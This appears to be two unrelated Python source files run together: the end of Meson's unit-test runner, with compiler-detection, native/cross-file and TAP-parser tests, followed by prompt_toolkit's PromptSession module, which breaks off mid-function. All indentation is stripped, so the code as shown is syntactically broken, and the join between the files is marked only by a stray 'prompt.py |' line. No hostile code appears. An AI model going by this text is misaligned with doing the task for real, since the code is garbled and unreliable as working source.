return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
raise SystemExit(main())
|
prompt.py | """
Line editing functionality.
---------------------------
This provides a UI for a line input, similar to GNU Readline, libedit and
linenoise.
Either call the `prompt` function for every line input. Or create an instance
of the :class:`.PromptSession` class and call the `prompt` method from that
class. In the second case, we'll have a 'session' that keeps all the state like
the history in between several calls.
There is a lot of overlap between the arguments taken by the `prompt` function
and the `PromptSession` (like `completer`, `style`, etcetera). There we have
the freedom to decide which settings we want for the whole 'session', and which
we want for an individual `prompt`.
Example::
# Simple `prompt` call.
result = prompt('Say something: ')
# Using a 'session'.
s = PromptSession()
result = s.prompt('Say something: ')
"""
from __future__ import unicode_literals
from prompt_toolkit.application import Application
from prompt_toolkit.application.current import get_app
from prompt_toolkit.auto_suggest import DynamicAutoSuggest
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.clipboard import DynamicClipboard, InMemoryClipboard
from prompt_toolkit.completion import DynamicCompleter, ThreadedCompleter
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER, SEARCH_BUFFER, EditingMode
from prompt_toolkit.eventloop import ensure_future, Return, From
from prompt_toolkit.filters import is_done, has_focus, renderer_height_is_known, to_filter, Condition, has_arg
from prompt_toolkit.formatted_text import to_formatted_text, merge_formatted_text
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.input.defaults import get_default_input
from prompt_toolkit.key_binding.bindings.auto_suggest import load_auto_suggest_bindings
from prompt_toolkit.key_binding.bindings.completion import display_completions_like_readline
from prompt_toolkit.key_binding.bindings.open_in_editor import load_open_in_editor_bindings
from prompt_toolkit.key_binding.key_bindings import KeyBindings, DynamicKeyBindings, merge_key_bindings, ConditionalKeyBindings, KeyBindingsBase
from prompt_toolkit.keys import Keys
from prompt_toolkit.layout import Window, HSplit, FloatContainer, Float
from prompt_toolkit.layout.containers import ConditionalContainer, WindowAlign
from prompt_toolkit.layout.controls import BufferControl, SearchBufferControl, FormattedTextControl
from prompt_toolkit.layout.dimension import Dimension
from prompt_toolkit.layout.layout import Layout
from prompt_toolkit.layout.margins import PromptMargin, ConditionalMargin
from prompt_toolkit.layout.menus import CompletionsMenu, MultiColumnCompletionsMenu
from prompt_toolkit.layout.processors import DynamicProcessor, PasswordProcessor, ConditionalProcessor, AppendAutoSuggestion, HighlightIncrementalSearchProcessor, HighlightSelectionProcessor, DisplayMultipleCursors, BeforeInput, ReverseSearchProcessor, ShowArg, merge_processors
from prompt_toolkit.layout.utils import explode_text_fragments
from prompt_toolkit.lexers import DynamicLexer
from prompt_toolkit.output.defaults import get_default_output
from prompt_toolkit.styles import BaseStyle, DynamicStyle
from prompt_toolkit.utils import suspend_to_background_supported
from prompt_toolkit.validation import DynamicValidator
from prompt_toolkit.widgets.toolbars import ValidationToolbar, SystemToolbar, SearchToolbar
from six import text_type
import contextlib
import threading
import time
__all__ = [
'PromptSession',
'prompt',
'confirm',
'create_confirm_session', # Used by '_display_completions_like_readline'.
'CompleteStyle',
]
def _split_multiline_prompt(get_prompt_text):
"""
Take a `get_prompt_text` function and return three new functions instead.
One that tells whether this prompt consists of multiple lines; one that
returns the fragments to be shown on the lines above the input; and another
one with the fragments to be shown at the first line of the input.
"""
def has_before_fragments():
for fragment, char in get_prompt_text():
if '\n' in char:
return True
return False
def before():
result = []
found_nl = False
for fragment, char in reversed(explode_text_fragments(get_prompt_text())):
if found_nl:
result.insert(0, (fragment, char))
elif char == '\n':
found_nl = True
return result
def first_input_line():
result = []
for fragment, char in reversed(explode_text_fragments(get_prompt_text())):
if char == '\n':
break
else:
result.insert(0, (fragment, char))
return result
return has_before_fragments, before, first_input_line
class _RPrompt(Window):
" The prompt that is displayed on the right side of the Window. "
def __init__(self, get_formatted_text):
super(_RPrompt, self).__init__(
FormattedTextControl(get_formatted_text),
align=WindowAlign.RIGHT,
style='class:rprompt')
def _true(value):
" Test whether `value` is True. In case of a Filter, call it. "
return to_filter(value)()
class CompleteStyle:
" How to display autocompletions for the prompt. "
COLUMN = 'COLUMN'
MULTI_COLUMN = 'MULTI_COLUMN'
READLINE_LIKE = 'READLINE_LIKE'
class PromptSession(object):
"""
PromptSession for a prompt application, which can be used as a GNU Readline
replacement.
This is a wrapper around a lot of ``prompt_toolkit`` functionality and can
be a replacement for `raw_input`.
All parameters that expect "formatted text" can take either just plain text
(a unicode object), a list of ``(style_str, text)`` tuples or an HTML object.
Example usage::
s = PromptSession(message='>')
text = s.prompt()
:param message: Plain text or formatted text to be shown before the prompt.
This can also be a callable that returns formatted text.
:param multiline: `bool` or :class:`~prompt_toolkit.filters.Filter`.
When True, prefer a layout that is more adapted for multiline input.
Text after newlines is automatically indented, and search/arg input is
shown below the input, instead of replacing the prompt.
:param wrap_lines: `bool` or :class:`~prompt_toolkit.filters.Filter`.
When True (the default), automatically wrap long lines instead of
scrolling horizontally.
:param is_password: Show asterisks instead of the actual typed characters.
:param editing_mode: ``EditingMode.VI`` or ``EditingMode.EMACS``.
:param vi_mode: `bool`, if True, Identical to ``editing_mode=EditingMode.VI``.
:param complete_while_typing: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Enable autocompletion while
typing.
:param validate_while_typing: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Enable input validation while
typing.
:param enable_history_search: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Enable up-arrow parting
string matching.
:param search_ignore_case:
:class:`~prompt_toolkit.filters.Filter`. Search case insensitive.
:param lexer: :class:`~prompt_toolkit.lexers.Lexer` to be used for the
syntax highlighting.
:param validator: :class:`~prompt_toolkit.validation.Validator` instance
for input validation.
:param completer: :class:`~prompt_toolkit.completion.Completer` instance
for input completion.
:param complete_in_thread: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Run the completer code in a
background thread in order to avoid blocking the user interface.
For ``CompleteStyle.READLINE_LIKE``, this setting has no effect. There
we always run the completions in the main thread.
:param reserve_space_for_menu: Space to be reserved for displaying the menu.
(0 means that no space needs to be reserved.)
:param auto_suggest: :class:`~prompt_toolkit.auto_suggest.AutoSuggest`
instance for input suggestions.
:param style: :class:`.Style` instance for the color scheme.
:param include_default_pygments_style: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Tell whether the default
styling for Pygments lexers has to be included. By default, this is
true, but it is recommended to be disabled if another Pygments style is
passed as the `style` argument, otherwise, two Pygments styles will be
merged.
:param enable_system_prompt: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Pressing Meta+'!' will show
a system prompt.
:param enable_suspend: `bool` or :class:`~prompt_toolkit.filters.Filter`.
Enable Control-Z style suspension.
:param enable_open_in_editor: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Pressing 'v' in Vi mode or
C-X C-E in emacs mode will open an external editor.
:param history: :class:`~prompt_toolkit.history.History` instance.
:param clipboard: :class:`~prompt_toolkit.clipboard.Clipboard` instance.
(e.g. :class:`~prompt_toolkit.clipboard.InMemoryClipboard`)
:param rprompt: Text or formatted text to be displayed on the right side.
This can also be a callable that returns (formatted) text.
:param bottom_toolbar: Formatted text or callable which is supposed to
return formatted text.
:param prompt_continuation: Text that needs to be displayed for a multiline
prompt continuation. This can either be formatted text or a callable
that the width as input and returns formatted text.
:param complete_style: ``CompleteStyle.COLUMN``,
``CompleteStyle.MULTI_COLUMN`` or ``CompleteStyle.READLINE_LIKE``.
:param mouse_support: `bool` or :class:`~prompt_toolkit.filters.Filter`
to enable mouse support.
:param default: The default input text to be shown. (This can be edited by
the user).
:param refresh_interval: (number; in seconds) When given, refresh the UI
every so many seconds.
:param inputhook: None or an Inputhook callable that takes an
`InputHookContext` object.
"""
_fields = (
'message', 'lexer', 'completer', 'complete_in_thread', 'is_password',
'editing_mode', 'key_bindings', 'is_password', 'bottom_toolbar',
'style', 'color_depth', 'include_default_pygments_style', 'rprompt',
'multiline', 'prompt_continuation', 'wrap_lines',
'enable_history_search', 'search_ignore_case', 'complete_while_typing',
'validate_while_typing', 'complete_style', 'mouse_support',
'auto_suggest', 'clipboard', 'validator', 'refresh_interval',
'input_processors', 'default', 'enable_system_prompt',
'enable_suspend', 'enable_open_in_editor', 'reserve_space_for_menu',
'tempfile_suffix', 'inputhook')
def __init__(
self,
message='',
default='',
multiline=False,
wrap_lines=True,
is_password=False,
vi_mode=False,
editing_mode=EditingMode.EMACS,
complete_while_typing=True,
validate_while_typing=True,
enable_history_search=False,
search_ignore_case=False,
lexer=None,
enable_system_prompt=False,
enable_suspend=False,
enable_open_in_editor=False,
validator=None,
completer=None,
complete_in_thread=False,
reserve_space_for_menu=8,
complete_style=None,
auto_suggest=None,
style=None,
color_depth=None,
include_default_pygments_style=True,
history=None,
clipboard=None,
prompt_continuation=None,
rprompt=None,
bottom_toolbar=None,
mouse_support=False,
input_processors=None,
key_bindings=None,
erase_when_done=False,
tempfile_suffix='.txt',
inputhook=None,
refresh_interval=0,
input=None,
output=None):
assert style is None or isinstance(style, BaseStyle)
assert input_processors is None or isinstance(input_processors, list)
assert key_bindings is None or isinstance(key_bindings, KeyBindingsBase)
# Defaults.
output = output or get_default_output()
input = input or get_default_input()
history = history or InMemoryHistory()
clipboard = clipboard or InMemoryClipboard()
# Ensure backwards-compatibility, when `vi_mode` is passed.
if vi_mode:
editing_mode = EditingMode.VI
# Store all settings in this class.
self.input = input
self.output = output
# Store all settings in this class.
for name in self._fields:
if name not in ('editing_mode', ):
value = locals()[name]
setattr(self, name, value)
# Create buffers, layout and Application.
self.history = history
self.default_buffer = self._create_default_buffer()
self.search_buffer = self._create_search_buffer()
self.layout = self._create_layout()
self.app = self._create_application(editing_mode, erase_when_done)
def _dyncond(self, attr_name):
"""
Dynamically take this setting from this 'PromptSession' class.
`attr_name` represents an attribute name of this class. Its value
can either be a boolean or a `Filter`.
This returns something that can be used as either a `Filter`
or `Filter`.
"""
@Condition
def dynamic():
value = getattr(self, attr_name)
return to_filter(value)()
return dynamic
def _create_default_buffer(self):
"""
Create and return the default input buffer.
"""
dyncond = self._dyncond
# Create buffers list.
def accept(buff):
""" Accept the content of the default buffer. This is called when
the validation succeeds. """
self.app.exit(result=buff.document.text)
# Reset content before running again.
self.app.pre_run_callables.append(buff.reset)
return Buffer(
name=DEFAULT_BUFFER,
# Make sure that complete_while_typing is disabled when
# enable_history_search is enabled. (First convert to Filter,
# to avoid doing bitwise operations on bool objects.)
complete_while_typing=Condition(lambda:
_true(self.complete_while_typing) and not
_true(self.enable_history_search) and not
self.complete_style == CompleteStyle.READLINE_LIKE),
validate_while_typing=dyncond('validate_while_typing'),
enable_history_search=dyncond('enable_history_search'),
validator=DynamicValidator(lambda: self.validator),
completer=DynamicCompleter(lambda:
ThreadedCompleter(self.completer)
if self.complete_in_thread and self.completer
else self.completer),
history=self.history,
auto_suggest=DynamicAutoSuggest(lambda: self.auto_suggest),
accept_handler=accept,
tempfile_suffix=lambda: self.tempfile_suffix)
def _create_search_buffer(self):
return Buffer(name=SEARCH_BUFFER)
def _create_layout(self):
"""
Create `Layout` for this prompt.
"""
dyncond = self._dyncond
# Create functions that will dynamically split the prompt. (If we have
# a multiline prompt.)
has_before_fragments, get_prompt_text_1, get_prompt_text_2 = \
_split_multiline_prompt(self._get_prompt)
default_buffer = self.default_buffer
search_buffer = self.search_buffer
# Create processors list.
all_input_processors = [
HighlightIncrementalSearchProcessor(),
HighlightSelectionProcessor(),
ConditionalProcessor(AppendAutoSuggestion(),
has_focus(default_buffer) & ~is_done),
ConditionalProcessor(PasswordProcessor(), dyncond('is_password')),
DisplayMultipleCursors(),
# Users can insert processors here.
DynamicProcessor(lambda: merge_processors(self.input_processors or [])),
# For single line mode, show the prompt before the input.
ConditionalProcessor(
merge_processors([
BeforeInput(get_prompt_text_2),
ShowArg(),
]),
~dyncond('multiline'))
]
# Create bottom toolbars.
bottom_toolbar = ConditionalContainer(
Window(FormattedTextControl(
lambda: self.bottom_toolbar,
style='class:bottom-toolbar.text'),
style='class:bottom-toolbar',
dont_extend_height=True,
height=Dimension(min=1)),
filter=~is_done & renderer_height_is_known &
Condition(lambda: self.bottom_toolbar is not None))
search_toolbar = SearchToolbar(
search_buffer,
ignore_case=dyncond('search_ignore_case'))
search_buffer_control = SearchBufferControl(
buffer=search_buffer,
input_processors=[
ReverseSearchProcessor(),
ShowArg(),
],
ignore_case=dyncond('search_ignore_case'))
system_toolbar = SystemToolbar(
enable_global_bindings=dyncond('enable_system_prompt'))
def get_search_buffer_control():
" Return the UIControl to be focused when searching start. "
if _true(self.multiline):
return search_toolbar.control
else:
return search_buffer_control
default_buffer_control = BufferControl(
buffer=default_buffer,
search_buffer_control=get_search_buffer_control,
input_processors=all_input_processors,
include_default_input_processors=False,
lexer=DynamicLexer(lambda: self.lexer),
preview_search=True)
default_buffer_window = Window(
default_buffer_control,
height=self._get_default_buffer_control_height,
left_margins=[
# In multiline mode, use the window margin to display
# the prompt and continuation fragments.
ConditionalMargin(
PromptMargin(get_prompt_text_2, self._get_continuation),
filter=dyncond('multiline'),
)
],
wrap_lines=dyncond('wrap_lines'))
@Condition
def multi_column_complete_style():
return self.complete_style == CompleteStyle.MULTI_COLUMN
# Build the layout.
layout = HSplit([
# The main input, with completion menus floating on top of it.
FloatContainer(
HSplit([
ConditionalContainer(
Window(
FormattedTextControl(get_prompt_text_1),
dont_extend_height=True),
Condition(has_before_fragments)
),
ConditionalContainer(
default_buffer_window,
Condition(lambda:
get_app().layout.current_control != search_buffer_control),
),
ConditionalContainer(
Window(search_buffer_control),
Condition(lambda:
get_app().layout.current_control == search_buffer_control),
),
]),
[
# Completion menus.
Float(xcursor=True,
ycursor=True,
content=CompletionsMenu(
max_height=16,
scroll_offset=1,
extra_filter=has_focus(default_buffer) &
~multi_column_complete_style)),
Float(xcursor=True,
ycursor=True,
content=MultiColumnCompletionsMenu(
show_meta=True,
extra_filter=has_focus(default_buffer) &
multi_column_complete_style)),
# The right prompt.
Float(right=0, top=0, hide_when_covering_content=True,
content=_RPrompt(lambda: self.rprompt)),
]
),
ConditionalContainer(
ValidationToolbar(),
filter=~is_done),
ConditionalContainer(
system_toolbar,
dyncond('enable_system_prompt') & ~is_done),
# In multiline mode, we use two toolbars for 'arg' and 'search'.
ConditionalContainer(
Window(FormattedTextControl(self._get_arg_text), height=1),
dyncond('multiline') & has_arg),
ConditionalContainer(search_toolbar, dyncond('multiline') & ~is_done),
bottom_toolbar,
])
return Layout(layout, default_buffer_window)
def _create_application(self, editing_mode, erase_when_done):
"""
Create the `Application` object.
"""
dyncond = self._dyncond
# Default key bindings.
auto_suggest_bindings = load_auto_suggest_bindings()
open_in_editor_bindings = load_open_in_editor_bindings()
prompt_bindings = self._create_prompt_bindings()
# Create application
application = Application(
layout=self.layout,
style=DynamicStyle(lambda: self.style),
include_default_pygments_style=dyncond('include_default_pygments_style'),
clipboard=DynamicClipboard(lambda: self.clipboard),
key_bindings=merge_key_bindings([
merge_key_bindings([
auto_suggest_bindings,
ConditionalKeyBindings(open_in_editor_bindings,
dyncond('enable_open_in_editor') &
has_focus(DEFAULT_BUFFER)),
prompt_bindings
]),
DynamicKeyBindings(lambda: self.key_bindings),
]),
mouse_support=dyncond('mouse_support'),
editing_mode=editing_mode,
